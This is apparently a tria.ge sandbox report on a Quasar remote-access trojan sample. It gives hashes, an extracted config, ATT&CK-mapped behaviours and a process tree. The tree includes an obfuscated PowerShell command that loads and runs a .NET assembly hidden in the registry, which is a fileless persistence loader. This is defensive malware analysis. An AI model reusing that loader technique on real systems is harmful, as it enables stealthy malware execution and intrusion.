Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
- max time kernel: 150s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 28/01/2025, 05:48
Behavioral task: behavioral1
- Sample: 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe
- Resource: win7-20240903-en
Behavioral task: behavioral2
- Sample: 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe
- Resource: win10v2004-20241007-en
General
- Target: 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe
- Size: 5.4MB
- MD5: dd2c5095b1d6590197ed2432837655f0
- SHA1: d287bb38f83941199fa66d7420b6f8cff2257a16
- SHA256: 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999
- SHA512: 24d7f1b61f07060f7723a306d46b1d82ca1b54a93770bfb783b83f613edb9a412f929a40c396fda5b6b3402ca37531f53ce1d42524623a6ce1cfee61e726e283
- SSDEEP: 98304:zHTFcsxxcsx30XgnNvfSDRyhoVi8rhh+xX/r:zHOgn0DRy2oR/r
Malware Config
Extracted: quasar
- encryption_key: 329720B689F7B7703EAAA9546BE3BAFE737B0649
- reconnect_delay: 3000
Signatures
- Quasar family
- Quasar payload (1 IoCs)
  resource: behavioral1/memory/1580-1-0x0000000001230000-0x0000000001798000-memory.dmp; yara_rule: family_quasar
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  description | pid | Process | procid_target
  PID 2664 created 432 | 2664 | powershell.EXE | 5
- Command and Scripting Interpreter: PowerShell
  pid | Process
  2664 | powershell.EXE
- Drops file in System32 directory (1 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
- Suspicious use of SetThreadContext (2 IoCs)
  description | pid | Process | procid_target
  PID 2968 set thread context of 2616 | 2968 | powershell.exe | 34
  PID 2664 set thread context of 1604 | 2664 | powershell.EXE | 38
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
- System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 1 IoCs)
  Adversaries may check for Internet connectivity on compromised systems.
  pid | Process
  884 | PING.EXE
- Modifies data under HKEY_USERS (2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.EXE
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b01959464871db01 | powershell.EXE
- Runs ping.exe (1 TTPs, 1 IoCs)
  pid | Process
  884 | PING.EXE
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1580 | 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe
  Token: SeDebugPrivilege | 2664 | powershell.EXE
  Token: SeDebugPrivilege | 2664 | powershell.EXE
  Token: SeDebugPrivilege | 1604 | dllhost.exe
- Suspicious use of WriteProcessMemory (41 IoCs)
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Windows\system32\winlogon.exe
  command line: winlogon.exe
  PID: 432
  - C:\Windows\System32\dllhost.exe
    command line: C:\Windows\System32\dllhost.exe /Processid:{d64a87c8-d3a5-47e2-a772-a2e09b1855bc}
    PID: 1604
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
- C:\Windows\system32\services.exe
  command line: C:\Windows\system32\services.exe
  PID: 476
- C:\Users\Admin\AppData\Local\Temp\24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe"
  PID: 1580
  signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\schtasks.exe
    command line: "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
    PID: 2908
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    PID: 2968
    signatures: Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
      PID: 2616
      signatures: System Location Discovery: System Language Discovery
  - C:\Windows\system32\cmd.exe
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\G9T1ti74EuwA.bat" "
    PID: 1724
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\chcp.com
      command line: chcp 65001
      PID: 916
    - C:\Windows\system32\PING.EXE
      command line: ping -n 10 localhost
      PID: 884
      signatures: System Network Configuration Discovery: Internet Connection Discovery; Runs ping.exe
- C:\Windows\system32\taskeng.exe
  command line: taskeng.exe {42A62481-6770-41EA-960C-F5A894FF4C1C} S-1-5-18:NT AUTHORITY\System:Service:
  PID: 2584
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('$'+'n'+''+'y'+''+[Char](97)+''+[Char](45)+''+'s'+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
    PID: 2664
    signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 166B
- MD5: 6b1c895d21f29a065dfaae4b74e2686c
- SHA1: 773e44d04792c3d82ab80ba748773e6290504a1f
- SHA256: e3e9d93b29dffc7699242fd5bcd0065a22203e96a06c9f6f62349b700a04af24
- SHA512: 05de89da0e7c07ea89761b32ecc327d63d672fe4229bb046b22a304e717eae16d1626607a7fbaa09fbf50151a4e37cf4e9d64415f86f1519292a7d5992292eb8